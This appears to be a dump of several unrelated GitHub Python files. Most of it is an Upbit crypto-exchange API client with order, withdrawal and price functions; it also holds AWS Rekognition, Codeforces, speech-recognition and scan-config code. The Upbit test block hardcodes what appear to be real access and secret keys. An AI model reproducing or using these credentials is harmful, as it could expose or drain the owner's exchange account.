        # TODO : support for states, identifiers still needs to be added
        try:
            p = re.compile(r"^\w+-\w+-\w+-\w+-\w+$")
            # strictly speaking, the input should be upper-cased and then
            # matched against the following regex:
            # - r"^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$"
            is_uuid = len(p.findall(ticker_or_uuid)) > 0
            if is_uuid:
                url = "https://api.upbit.com/v1/order"
                data = {'uuid': ticker_or_uuid}
                headers = self._request_headers(data)
                result = req._send_get_request(url, headers=headers, data=data)
            else :

                url = "https://api.upbit.com/v1/orders"
                data = {'market': ticker_or_uuid,
                        'state': state,
                        'kind': kind,
                        'order_by': 'desc'
                        }
                headers = self._request_headers(data)
                result = req._send_get_request(url, headers=headers, data=data)

            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None


    def get_individual_order(self, uuid, contain_req=False):
        """
        Query an individual order
        :param uuid: order id
        :param contain_req: whether to include Remaining-Req
        :return:
        """
        # TODO : support for states, uuids, identifiers still needs to be added
        try:
            url = "https://api.upbit.com/v1/order"
            data = {'uuid': uuid}
            headers = self._request_headers(data)
            result = req._send_get_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None

    # Request an order cancellation
    def cancel_order(self, uuid, contain_req=False):
        """
        Cancel an order
        :param uuid: the uuid from the return value of an order call
        :param contain_req: whether to include Remaining-Req
        :return:
        """
        try:
            url = "https://api.upbit.com/v1/order"
            data = {"uuid": uuid}
            headers = self._request_headers(data)
            result = req._send_delete_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None


    # Orders
    def buy_limit_order(self, ticker, price, volume, contain_req=False):
        """
        Limit buy
        :param ticker: market ticker
        :param price: order price
        :param volume: order volume
        :param contain_req: whether to include Remaining-Req
        :return:
        """
        try:
            url = "https://api.upbit.com/v1/orders"
            data = {"market": ticker,
                    "side": "bid",
                    "volume": str(volume),
                    "price": str(price),
                    "ord_type": "limit"}
            headers = self._request_headers(data)
            result = req._send_post_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None

    def buy_market_order(self, ticker, price, contain_req=False):
        """
        Market buy
        :param ticker: ticker for cryptocurrency
        :param price: KRW
        :param contain_req: whether to include Remaining-Req
        :return:
        """
        try:
            url = "https://api.upbit.com/v1/orders"
            data = {"market": ticker,  # market ID
                    "side": "bid",  # buy
                    "price": str(price),
                    "ord_type": "price"}
            headers = self._request_headers(data)
            result = req._send_post_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None

    def sell_market_order(self, ticker, volume, contain_req=False):
        """
        Market sell
        :param ticker: cryptocurrency ticker
        :param volume: volume
        :param contain_req: whether to include Remaining-Req
        :return:
        """
        try:
            url = "https://api.upbit.com/v1/orders"
            data = {"market": ticker,  # ticker
                    "side": "ask",  # sell
                    "volume": str(volume),
                    "ord_type": "market"}
            headers = self._request_headers(data)
            result = req._send_post_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None

    def sell_limit_order(self, ticker, price, volume, contain_req=False):
        """
        Limit sell
        :param ticker: market ticker
        :param price: order price
        :param volume: order volume
        :param contain_req: whether to include Remaining-Req
        :return:
        """
        try:
            url = "https://api.upbit.com/v1/orders"
            data = {"market": ticker,
                    "side": "ask",
                    "volume": str(volume),
                    "price": str(price),
                    "ord_type": "limit"}
            headers = self._request_headers(data)
            result = req._send_post_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None
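
    # Illustrative flow (a sketch, not part of the original class): every
    # order method returns the raw API response, whose 'uuid' field feeds
    # get_order()/cancel_order(). Hypothetical values:
    #   order = upbit.buy_limit_order("KRW-BTC", 20000000, 0.0005)
    #   status = upbit.get_order(order["uuid"])   # single-order lookup
    #   upbit.cancel_order(order["uuid"])         # cancel while still 'wait'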


    #--------------------------------------------------------------------------
    # Withdrawals
    #--------------------------------------------------------------------------
    # Query an individual withdrawal
    def get_individual_withdraw_order(self, uuid: str, currency: str, contain_req=False):
        """
        Query an individual withdrawal
        :param uuid: withdrawal UUID
        :param txid: withdrawal TXID
        :param currency: currency code
        :param contain_req: whether to include Remaining-Req
        :return:
        """
        try:
            url = "https://api.upbit.com/v1/withdraw"
            data = {"uuid": uuid, "currency": currency}
            headers = self._request_headers(data)
            result = req._send_get_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None


    # Withdraw a coin
    def withdraw_coin(self, currency, amount, address, secondary_address='None', transaction_type='default', contain_req=False):
        """
        Withdraw a coin
        :param currency: currency symbol
        :param amount: order amount
        :param address: withdrawal wallet address
        :param secondary_address: secondary withdrawal address (only for coins that require it)
        :param transaction_type: withdrawal type
        :param contain_req: whether to include Remaining-Req
        :return:
        """
        try:
            url = "https://api.upbit.com/v1/withdraws/coin"
            data = {"currency": currency,
                    "amount": amount,
                    "address": address,
                    "secondary_address": secondary_address,
                    "transaction_type": transaction_type}
            headers = self._request_headers(data)
            result = req._send_post_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None


    # Withdraw KRW
    def withdraw_cash(self, amount: str, contain_req=False):
        """
        Withdraw cash
        :param amount: amount to withdraw
        :param contain_req: whether to include Remaining-Req
        :return:
        """
        try:
            url = "https://api.upbit.com/v1/withdraws/krw"
            data = {"amount": amount}
            headers = self._request_headers(data)
            result = req._send_post_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None


    #--------------------------------------------------------------------------
    # Deposits
    #--------------------------------------------------------------------------
    # Query the deposit list
    # Query an individual deposit
    # Request creation of a deposit address
    # Query all deposit addresses
    # Query an individual deposit address
    # Deposit KRW


    #--------------------------------------------------------------------------
    # Service info
    #--------------------------------------------------------------------------
    # Deposit/withdrawal status
    def get_deposit_withdraw_status(self, contain_req=False):
        url = "https://api.upbit.com/v1/status/wallet"
        headers = self._request_headers()
        result = req._send_get_request(url, headers=headers)
        if contain_req:
            return result
        else:
            return result[0]


    # Query the API key list
    def get_api_key_list(self, contain_req=False):
        url = "https://api.upbit.com/v1/api_keys"
        headers = self._request_headers()
        result = req._send_get_request(url, headers=headers)
        if contain_req:
            return result
        else:
            return result[0]


#--------------------------------------------------------------------------
# Ticker queries
#--------------------------------------------------------------------------
def get_url_ohlcv(interval):
    """Return the url for an ohlcv request
    Args:
        interval (str): "day", "minute1", "minute3", "minute5", "week", "month"
    Returns:
        str: upbit api url
    """

    if interval in ["day", "days"]:
        url = "https://api.upbit.com/v1/candles/days"
    elif interval in ["minute1", "minutes1"]:
        url = "https://api.upbit.com/v1/candles/minutes/1"
    elif interval in ["minute3", "minutes3"]:
        url = "https://api.upbit.com/v1/candles/minutes/3"
    elif interval in ["minute5", "minutes5"]:
        url = "https://api.upbit.com/v1/candles/minutes/5"
    elif interval in ["minute10", "minutes10"]:
        url = "https://api.upbit.com/v1/candles/minutes/10"
    elif interval in ["minute15", "minutes15"]:
        url = "https://api.upbit.com/v1/candles/minutes/15"
    elif interval in ["minute30", "minutes30"]:
        url = "https://api.upbit.com/v1/candles/minutes/30"
    elif interval in ["minute60", "minutes60"]:
        url = "https://api.upbit.com/v1/candles/minutes/60"
    elif interval in ["minute240", "minutes240"]:
        url = "https://api.upbit.com/v1/candles/minutes/240"
    elif interval in ["week", "weeks"]:
        url = "https://api.upbit.com/v1/candles/weeks"
    elif interval in ["month", "months"]:
        url = "https://api.upbit.com/v1/candles/months"
    else:
        url = "https://api.upbit.com/v1/candles/days"

    return url
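
# Illustrative note (a sketch, not in the original file): both alias
# spellings map to the same endpoint,
#   get_url_ohlcv("minute15") == get_url_ohlcv("minutes15")
#   -> "https://api.upbit.com/v1/candles/minutes/15"
# and unknown intervals silently fall back to the daily endpoint.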

def get_tickers(fiat="", is_details=False, limit_info=False, verbose=False):
    """Query Upbit tickers
    Args:
        fiat (str, optional): fiat (KRW, BTC, USDT). Defaults to empty string.
        limit_info (bool, optional): True: also return request-limit info, False: don't. Defaults to False.
    Returns:
        tuple/list: a tuple when limit_info is True, otherwise a list
    """
    url = "https://api.upbit.com/v1/market/all"
    detail = "true" if is_details else "false"
    markets, req_limit_info = req._call_public_api(url, isDetails=detail)

    if verbose:
        tickers = [x for x in markets if x['market'].startswith(fiat)]
    else:
        tickers = [x['market'] for x in markets if x['market'].startswith(fiat)]

    if limit_info:
        return tickers, req_limit_info
    else:
        return tickers

def get_ohlcv(ticker="KRW-BTC", interval="day", count=200, to=None, period=0.1):
    MAX_CALL_COUNT = 200
    try:
        url = get_url_ohlcv(interval=interval)

        if to == None:
            to = dt.datetime.now()
        elif isinstance(to, str):
            to = pd.to_datetime(to).to_pydatetime()
        elif isinstance(to, pd._libs.tslibs.timestamps.Timestamp):
            to = to.to_pydatetime()

        to = to.astimezone(dt.timezone.utc)

        dfs = []
        count = max(count, 1)
        for pos in range(count, 0, -200):
            query_count = min(MAX_CALL_COUNT, pos)

            to = to.strftime("%Y-%m-%d %H:%M:%S")

            contents, req_limit_info = req._call_public_api(url, market=ticker, count=query_count, to=to)
            dt_list = [dt.datetime.strptime(x['candle_date_time_kst'], "%Y-%m-%dT%H:%M:%S") for x in contents]
            df = pd.DataFrame(contents,
                              columns=[
                                  'opening_price',
                                  'high_price',
                                  'low_price',
                                  'trade_price',
                                  'candle_acc_trade_volume',
                                  'candle_acc_trade_price'],
                              index=dt_list)
            df = df.sort_index()
            if df.shape[0] == 0:
                break
            dfs += [df]

            to = dt.datetime.strptime(contents[-1]['candle_date_time_utc'], "%Y-%m-%dT%H:%M:%S")

            if pos > 200:
                time.sleep(period)

        df = pd.concat(dfs).sort_index()
        df = df.rename(columns={"opening_price": "open",
                                "high_price": "high",
                                "low_price": "low",
                                "trade_price": "close",
                                "candle_acc_trade_volume": "volume",
                                "candle_acc_trade_price": "value"})
        return df
    except Exception as x:
        return None
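
# Illustrative note (a sketch, not in the original file): the candle endpoint
# caps each call at 200 rows, so a hypothetical 450-candle request is served
# as 200 + 200 + 50 batches, walking `to` backwards between calls:
#   df = get_ohlcv("KRW-BTC", interval="minute15", count=450)
#   len(df)  # up to 450 rows, oldest first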

def get_current_price(ticker="KRW-BTC", limit_info=False, verbose=False):
    """Query current price info
    Args:
        ticker (str/list, optional): a single ticker or a list of tickers. Defaults to "KRW-BTC".
        limit_info (bool, optional): True: also return request-limit info. Defaults to False.
        verbose (bool, optional): True: return the raw API payload. Defaults to False.
    Returns:
        [type]: [description]
    """
    url = "https://api.upbit.com/v1/ticker"
    data, req_limit_info = req._call_public_api(url, markets=ticker)

    if isinstance(ticker, str) or (isinstance(ticker, list) and len(ticker)==1):
        # a single ticker
        if verbose is False:
            price = data[0]['trade_price']
        else:
            price = data[0]
    else:
        # queried with multiple tickers
        if verbose is False:
            price = {x['market']: x['trade_price'] for x in data}
        else:
            price = data

    if limit_info:
        return price, req_limit_info
    else:
        return price




if __name__ == "__main__":
    import pprint

    #-------------------------------------------------------------------------
    # api key
    #-------------------------------------------------------------------------
    #with open("upbit.txt") as f:
    #    lines = f.readlines()
    #    access = lines[0].strip()
    #    secret = lines[1].strip()

    access = "dcA4JFsGWHRJcqnSmGNRM3FdMCLt4J4i2dSxX7uD"
    secret = "QuxtgJxiyhxUz9xuuvq9O2qIdxxSclvQIas9bWWn"
    upbit = UPBIT(access, secret)


    #-------------------------------------------------------------------------
    # Assets
    # query all accounts
    balance = upbit.get_balances()
    pprint.pprint(balance)

    #balances = upbit.get_order("KRW-XRP")
    #pprint.pprint(balances)

    # order = upbit.get_order('50e184b3-9b4f-4bb0-9c03-30318e3ff10a')
    # print(order)
    # # KRW balance
    print(upbit.get_balance(ticker="KRW"))  # KRW held
    # print(upbit.get_amount('ALL'))  # total purchase amount
    # print(upbit.get_balance(ticker="KRW-BTC"))  # BTC quantity held
    # print(upbit.get_balance(ticker="KRW-XRP"))  # XRP quantity held

    #-------------------------------------------------------------------------
    # Orders
    # order availability info
    #pprint.pprint(upbit.get_chance('KRW-BTC'))

    # query an individual order
    #print(upbit.get_order('KRW-GRS'))

    # sell
    # print(upbit.sell_limit_order("KRW-XRP", 1000, 20))

    # buy
    # print(upbit.buy_limit_order("KRW-XRP", 200, 20))

    # cancel an order
    # print(upbit.cancel_order('82e211da-21f6-4355-9d76-83e7248e2c0c'))

    # market buy test
    # upbit.buy_market_order("KRW-XRP", 10000)

    # market sell test
    # upbit.sell_market_order("KRW-XRP", 36)


    #-------------------------------------------------------------------------
    # Service info
    # deposit/withdrawal status
    #resp = upbit.get_deposit_withdraw_status()
    #pprint.pprint(resp)

    # query the API key list
    resp = upbit.get_api_key_list()
    print(resp)","repo_name":"iCareLab/coins","sub_path":"ex_upbit/api_exchange.py","file_name":"api_exchange.py","file_ext":"py","file_size_in_byte":26939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"43044904773","text":"import boto3
from PIL import Image  # To install package: pip install Pillow


def ShowBoundingBoxPositions(imageHeight, imageWidth, box, rotation):
    """Calculate the bounding box surrounding an identified face.

    The calculation takes the image rotation into account.

    :param imageHeight: Height of entire image in pixels
    :param imageWidth: Width of entire image in pixels
    :param box: Dictionary containing bounding box data points
    :param rotation: Image orientation determined by Rekognition
    """

    # Calculate left and top points taking image rotation into account
    left = 0
    top = 0
    if rotation == 'ROTATE_0':
        left = imageWidth * box['Left']
        top = imageHeight * box['Top']

    if rotation == 'ROTATE_90':
        left = imageHeight * (1 - (box['Top'] + box['Height']))
        top = imageWidth * box['Left']

    if rotation == 'ROTATE_180':
        left = imageWidth - (imageWidth * (box['Left'] + box['Width']))
        top = imageHeight * (1 - (box['Top'] + box['Height']))

    if rotation == 'ROTATE_270':
        left = imageHeight * box['Top']
        top = imageWidth * (1 - box['Left'] - box['Width'])

    print('Bounding box of face:')
    print(f'  Left: {round(left)}, Top: {round(top)}, '
          f'Width: {round(imageWidth * box["Width"])}, '
          f'Height: {round(imageHeight * box["Height"])}')
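
# Illustrative only (hypothetical values, not part of the original sample):
# for a 640x480 image reported as ROTATE_0, a relative box of Left=0.25,
# Top=0.5, Width=0.5, Height=0.25 prints Left: 160, Top: 240, Width: 320,
# Height: 120.
if __name__ == "__demo__":  # never true; kept as a sketch only
    ShowBoundingBoxPositions(
        480, 640,
        {'Left': 0.25, 'Top': 0.5, 'Width': 0.5, 'Height': 0.25},
        'ROTATE_0')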
(box['Left'] + box['Width']))\n top = imageHeight * (1 - (box['Top'] + box['Height']))\n\n if rotation == 'ROTATE_270':\n left = imageHeight * box['Top']\n top = imageWidth * (1- box['Left'] - box['Width'] )\n\n print('Bounding box of face:')\n print(f' Left: {round(left)}, Top: {round(top)}, '\n f'Width: {round(imageWidth * box[\"Width\"])}, '\n f'Height: {round(imageHeight * box[\"Height\"])}')\n\n\nif __name__ == \"__main__\":\n \"\"\"Exercise the Rekognition recognize_celebrities() method and \n ShowBoundingBoxPositions()\"\"\"\n\n # Set the photo variable to the image filename to process\n photo = 'CELEBRITY_PHOTO.JPG'\n\n # Extract the image width, height, and EXIF data\n try:\n with Image.open(photo) as image:\n width, height = image.size\n exif = None\n if 'exif' in image.info:\n exif = image.info['exif']\n except IOError as e:\n print(e)\n exit(1)\n print(f'File name: {photo}')\n print(f'Image width, height: {width}, {height}')\n\n # Read the entire image into memory\n try:\n with open(photo, 'rb') as f:\n image_binary = f.read()\n except IOError as e:\n print(e)\n exit(2)\n\n # Detect the celebrities in the photo\n client = boto3.client('rekognition', region_name='us-east-1')\n response = client.recognize_celebrities(Image={'Bytes': image_binary})\n\n if 'OrientationCorrection' in response:\n print(f'Image orientation: {response[\"OrientationCorrection\"]}')\n else:\n print('No estimated orientation. Check the image\\'s Exif metadata.')\n\n # List the identified celebrities\n print('Detected celebrities...')\n celebrities = response['CelebrityFaces']\n if not celebrities:\n print('No celebrities detected')\n else:\n for celebrity in celebrities:\n print(f'\\nName: {celebrity[\"Name\"]}')\n print(f'Match confidence: {celebrity[\"MatchConfidence\"]}')\n\n # List the bounding box that surrounds the face\n if 'OrientationCorrection' in response:\n ShowBoundingBoxPositions(height, width,\n celebrity['Face']['BoundingBox'],\n response['OrientationCorrection'])","repo_name":"arunmastermind/AWS-examples-using-BOTO3","sub_path":"rekognition/rekognition-image-python-image-orientation-bounding-box.py","file_name":"rekognition-image-python-image-orientation-bounding-box.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1549150385","text":"# https://codeforces.com/problemset/problem/1355/A\n\"\"\"\na2 = a1 + mx1*mn1\na3 = a2 + mx2*mx2\n\"\"\"\n\n\ndef max_min_digits(n):\n x = list(map(int, list(str(n))))\n return max(x) * min(x)\n\n\ndef a(n):\n if n == 1:\n return a1\n ai = a1\n n -= 1\n while n > 0:\n y = max_min_digits(ai)\n if y == 0: # once minimum digit becomes 0, we don't are not adding anything new, so number remains same.\n break\n ai += y\n n -= 1\n return ai\n\n\nif __name__ == \"__main__\":\n t = int(input())\n for case in range(t):\n a1, K = map(int, input().split())\n print(a(K))\n","repo_name":"Jahnavi-Mantripragada/CodeForces","sub_path":"1355/SequenceWithDigits.py","file_name":"SequenceWithDigits.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17835107027","text":"import os\nimport pandas as pd\nimport numpy as np\nimport Levenshtein\n\nimport torch\nimport torchaudio\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom tqdm import tqdm\nimport gc\nfrom torchsummaryX import summary\nimport wandb\nfrom glob import glob\n\nimport torch.distributed as 
dist\nimport torch.utils.data as torchdata\nfrom torch.nn.parallel import DistributedDataParallel as DDP\n\nfrom modules.utils import set_random_seed, plot_attention, calc_edit_distance, indices_to_chars\nfrom modules.dataset import ToyDataset, AudioDataset, AudioDatasetTest\nfrom models.LAS import Listener, Attention, LAS\n\nimport argparse\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\ndef parse_args(argv=None):\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('--distributed', type=bool, default=False)\n parser.add_argument(\n '--model_dir', default=os.path.join(os.path.dirname(__file__), 'weights/LAS'))\n parser.add_argument('--exp_name', default='LAS')\n parser.add_argument('--toy', default=False)\n args = parser.parse_args(argv)\n return args\nargs = parse_args()\n\nset_random_seed(seed_num=1)\n\n# multi gpu\ndistributed = args.distributed\nlocal_rank, gpu_ids = 0, [0, 1, 2, 3]\nbatch_size = 16\n\nif distributed:\n gpu_no = len(gpu_ids)\nelse:\n gpu_no = 1\n\ntry:\n local_rank = int(os.environ[\"LOCAL_RANK\"])\nexcept:\n pass\n\ndevice = f'cuda:{local_rank}' if torch.cuda.is_available() else 'cpu'\nDEVICE = device\n\nif distributed and device != 'cpu':\n torch.cuda.set_device(local_rank)\n dist.init_process_group(backend='nccl', init_method='env://')\n print('local_rank', local_rank)\n\nif device != 'cpu' and distributed:\n batch_size *= len(gpu_ids)\n\n# Global config dict.\nconfig = {\n \"batch_size\" : batch_size,\n \"num_workers\" : 24, # mac 0\n\n \"encoder_hidden_size\" : 512,\n \"locked_dropout\" : 0.35,\n \"dropout\" : 0.2,\n\n \"epochs\" : 70,\n \"lr\" : 1e-3,\n \"weight_decay\" : 5e-6,\n \"step_size\" : 3,\n \"scheduler_gamma\" : 0.5,\n}\n\nif args.toy:\n # Load the toy dataset\n X_train = np.load(\"data/f0176_mfccs_train.npy\") # (1600, 176, 26)\n X_valid = np.load(\"data/f0176_mfccs_dev.npy\") # (1600, 176, 26)\n Y_train = np.load(\"data/f0176_hw3p2_train.npy\") # (1600, 23)\n Y_valid = np.load(\"data/f0176_hw3p2_dev.npy\") # (1600, 23)\n\n # This is how you actually need to find out the different trancripts in a dataset. \n # Can you think whats going on here? 
Why are we using a np.unique?\n VOCAB_MAP = dict(zip(np.unique(Y_valid), range(len(np.unique(Y_valid))))) \n VOCAB_MAP[\"[PAD]\"] = len(VOCAB_MAP)\n VOCAB = list(VOCAB_MAP.keys()) # 43 unique characters\n\n SOS_TOKEN = VOCAB_MAP[\"[SOS]\"]\n EOS_TOKEN = VOCAB_MAP[\"[EOS]\"]\n PAD_TOKEN = VOCAB_MAP[\"[PAD]\"]\n\n Y_train = [np.array([VOCAB_MAP[p] for p in seq]) for seq in Y_train]\n Y_valid = [np.array([VOCAB_MAP[p] for p in seq]) for seq in Y_valid]\n\nelse:\n # These are the various characters in the transcripts of the datasetW\n VOCAB = ['', \n 'A', 'B', 'C', 'D', \n 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L', \n 'M', 'N', 'O', 'P', \n 'Q', 'R', 'S', 'T', \n 'U', 'V', 'W', 'X', \n 'Y', 'Z', \"'\", ' ', \n ''] # 30 unique characters\n\n VOCAB_MAP = {VOCAB[i]:i for i in range(0, len(VOCAB))}\n\n SOS_TOKEN = VOCAB_MAP[\"\"]\n EOS_TOKEN = VOCAB_MAP[\"\"]\n\n# TODO: Create the datasets and dataloaders\n# All these things are similar to HW3P2\n# You can reuse the same code\nroot = 'data/hw4p2/' \ngc.collect() \n\n# Time Masking and Frequency Masking are 2 types of transformation, you may choose to apply\ntransform = None #torchaudio.transforms.SlidingWindowCmn()\nif args.toy:\n train_data = ToyDataset(\"train\", X_train, Y_train)\n val_data = ToyDataset(\"valid\", X_valid, Y_valid)\nelse:\n train_data = AudioDataset(root, VOCAB, [\"train-clean-100\"], transform=transform)\n val_data = AudioDataset(root, VOCAB, [\"dev-clean\"], transform=transform)\ntest_data = AudioDatasetTest(root, VOCAB, \"test-clean\", transform=transform)\n\n\n\ntrain_sampler = None\nif distributed:\n train_sampler = torchdata.distributed.DistributedSampler(train_data)\n\ntrain_loader = torch.utils.data.DataLoader(train_data, num_workers= config['num_workers'],\n batch_size=config['batch_size'], pin_memory=True,\n shuffle=(train_sampler is None), sampler=train_sampler, \n collate_fn=train_data.collate_fn)\n\nval_loader = torch.utils.data.DataLoader(val_data, num_workers=config['num_workers'],\n batch_size=config['batch_size'], pin_memory=True,\n shuffle=False, collate_fn=val_data.collate_fn)\n\ntest_loader = torch.utils.data.DataLoader(test_data, num_workers=config['num_workers'], \n batch_size=config['batch_size'], pin_memory=True, \n shuffle=False, collate_fn=test_data.collate_fn)\n\nprint(\"Batch size: \", config['batch_size'])\nprint(\"Train dataset samples = {}, batches = {}\".format(train_data.__len__(), len(train_loader)))\nprint(\"Val dataset samples = {}, batches = {}\".format(val_data.__len__(), len(val_loader)))\nprint(\"Test dataset samples = {}, batches = {}\".format(test_data.__len__(), len(test_loader)))\n\n# The sanity check for shapes also are similar\n# sanity check\nfor data in train_loader:\n x, y, lx, ly = data\n # print(x.shape, y.shape, lx.shape, ly.shape)\n # [batch_size, 1658, 15] [batch_size, 246] [batch_size] [batch_size]\n break \n# for data in test_loader:\n# x_test, lx_test = data\n# print(x_test.shape, lx_test.shape)\n# # [batch_size, 1047, 15] [batch_size]\n# break \ninput_size = 15\n\n# Encoder Check\n# encoder_hidden_size = 256\n# encoder = Listener(input_size, encoder_hidden_size, 0)# TODO: Initialize Listener\n# print(encoder)\n# # summary(encoder, x.to(DEVICE), lx)\n# del encoder\n\n\n# Baseline LAS has the following configuration:\n# Encoder bLSTM/pbLSTM Hidden Dimension of 512 (256 per direction)\n# Decoder Embedding Layer Dimension of 256\n# Decoder Hidden Dimension of 512 \n# Decoder Output Dimension of 128\n# Attention Projection Size of 128\n# Feel Free to Experiment with this 
\n\nmodel = LAS(\n # Initialize your model \n # Read the paper and think about what dimensions should be used\n # You can experiment on these as well, but they are not requried for the early submission\n # Remember that if you are using weight tying, some sizes need to be the same\n input_size, encoder_hidden_size=config['encoder_hidden_size'],\n vocab_size=len(VOCAB), embed_size=256,\n decoder_hidden_size=512, decoder_output_size=128, projection_size=128,\n locked_dropout=config['locked_dropout'], dropout=config['dropout'],\n device=DEVICE,\n)\n\nmodel = model.to(DEVICE)\nif distributed:\n model = DDP(model, device_ids=[local_rank])\n# print(model)\n\nsummary(model, \n x=x.to(DEVICE), \n x_lens=lx, \n y=y.to(DEVICE))\n\n\noptimizer = torch.optim.AdamW(model.parameters(), lr=config['lr'], amsgrad=True, weight_decay=config['weight_decay'])\ncriterion = torch.nn.CrossEntropyLoss(reduction='none') # Why are we using reduction = 'none' ? \nscaler = torch.cuda.amp.GradScaler()\n# Optional: Create a custom class for a Teacher Force Schedule \nscheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', min_lr=2e-8, \n patience=config['step_size'], factor=config['scheduler_gamma'])\n\n\n# Optional: Load your best model Checkpoint here\npath = os.path.join(args.model_dir, 'checkpoint' + '.pth')\ncheckpoint = torch.load(path, map_location=device)\nmodel.load_state_dict(checkpoint['model_state_dict'])\n\n\n# TODO: Create a testing function similar to validation \ndef make_string(predictions, vocab):\n pred_strs = []\n for i in range(predictions.shape[0]):\n pred_sliced = indices_to_chars(predictions[i], vocab)\n pred_string = \"\".join(pred_sliced)\n pred_strs.append(pred_string)\n\n return pred_strs\n\ndef predict(model, test_loader):\n\n model.eval()\n batch_bar = tqdm(total=len(test_loader), dynamic_ncols=True, position=0, leave=False, desc='Test', ncols=5)\n test_results = []\n \n for i, (x, lx) in enumerate(test_loader):\n x, lx = x.to(DEVICE), lx.to(DEVICE)\n\n with torch.no_grad():\n predictions, attentions = model(x, lx)\n \n greedy_predictions = torch.argmax(predictions, dim=2)\n pred_str = make_string(greedy_predictions, VOCAB)\n test_results.extend(pred_str)\n \n batch_bar.update()\n\n del x, lx\n \n batch_bar.close()\n return test_results\n\npredictions = predict(model, test_loader)\n# TODO: Create a file with all predictions \ndf = pd.read_csv('data/hw4p2/test-clean/transcript/random_submission.csv')\ndf.label = predictions\ndf.rename(columns={\"index\": \"id\"}, inplace=True)\n\ndf.to_csv('HW4P2/results/submission' + args.exp_name + '.csv', index = False)\n# TODO: Submit to Kaggle\n#!kaggle competitions submit -c 11-785-f22-hw3p2 -f results/submission_early.csv","repo_name":"JwaYounkyung/CMU_IDL","sub_path":"HW4P2/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3613405361","text":"from Pipe_And_Filter_Autosection.classes.FileManager import FileManager as FM\nimport configparser\nimport xml.etree.ElementTree as ET\nimport numpy as np\n\nclass OCTScanConfig:\n \"\"\"\n\n Args:\n\n Attributes:\n sp (): dictionary of the scan parameters file\n num_scanlines ():\n y_data ():\n x_filt ():\n y_filt ():\n filter_name (str): name of filter applied if any.\n attr2 (:obj:`int`, optional): Description of `attr2`.\n\n Properties:\n num_channels: 3\n seg_size: 50,000\n\n Todo:\n Make a method to return all the datasets that have already been cut\n 
\"\"\"\n\n @staticmethod\n def height_fit_coeff_read_func(strOrCSV):\n # strOrCSV is either a comma delimited string of numberical coefficients or it is a filepath to the OCT_ScanConfig file where the coefficients are held\n coeff = np.fromstring(strOrCSV, sep=',')\n if coeff.size == 0:\n coeff_oct_sc = OCTScanConfig(strOrCSV)\n coeff = coeff_oct_sc._secp['height_fit_coefficients']\n return coeff\n\n # values are functions that should be performed for certain keys\n key_types = {'num_b_scans_estimate': int, 'section_alg': str, 'height_fit_coefficients': height_fit_coeff_read_func.__func__}\n\n def write_to_file(self, key, value, heading='SCAN_SETTINGS'):\n \"\"\"write to a config file\n Args:\n key:\n value:\n heading:\n\n Returns:\n\n \"\"\"\n if heading.lower() == 'SCAN_SETTINGS'.lower():\n dict_to_write_to = self.sp\n elif heading.lower() == 'Sectioning_Parameters'.lower():\n dict_to_write_to = self._secp\n else:\n raise Exception(\"Unexpected Section Title\")\n\n FM.write_to_config_file(self.file_path, dict_to_write_to, key, value, heading)\n\n @property\n def left_trimd_crd(self):\n return self._left_trimd_crd\n\n @property\n def right_trimd_crd(self):\n return self._right_trimd_crd\n\n @property\n def num_scanlines(self):\n return self._num_scanlines\n\n @property\n def sp(self):\n return self._sp\n\n @property\n def file_path(self):\n return self._file_path\n\n def __init__(self, file_path: str = None) -> None:\n #initialize vars\n self._file_path = file_path\n self._sp = OCTScanConfig.read_config_file(file_path, \"Scan_Parameters\", self.key_types)\n self._num_scanlines = None\n self._secp = None\n try:\n self._secp = OCTScanConfig.read_config_file(file_path, 'Sectioning_Parameters', self.key_types)\n except configparser.NoOptionError or configparser.NoSectionError as e:\n pass\n self._left_trimd_crd = self.sp['left_crd'] + self.sp['start_trim']\n self._right_trimd_crd = self.sp['left_crd'] + self.sp['scan_width'] - self.sp['stop_trim']\n self.section_alg = None\n\n def set_num_scanlines(self):\n self._num_scanlines = OCTScanConfig.return_num_scanlines(None, self._sp)\n\n @staticmethod\n def read_config_file(filepath, section_title=None, key_type=None):\n # returns config if section title isn't given, otherwise it returns the config[section_title] dictionary\n config = configparser.ConfigParser()\n config.optionxform = str # makes config read files case sensitively\n config.read(filepath)\n # print(config.sections())\n if section_title is None:\n config_dict = {}\n for section_title in config.sections():\n temp_config_dict = {}\n for key, val in config[section_title].items():\n if key in key_type:\n temp_config_dict[key] = key_type[key](val)\n else:\n try:\n temp_config_dict[key] = float(val)\n except ValueError:\n temp_config_dict[key] = val\n config_dict = {**config_dict, 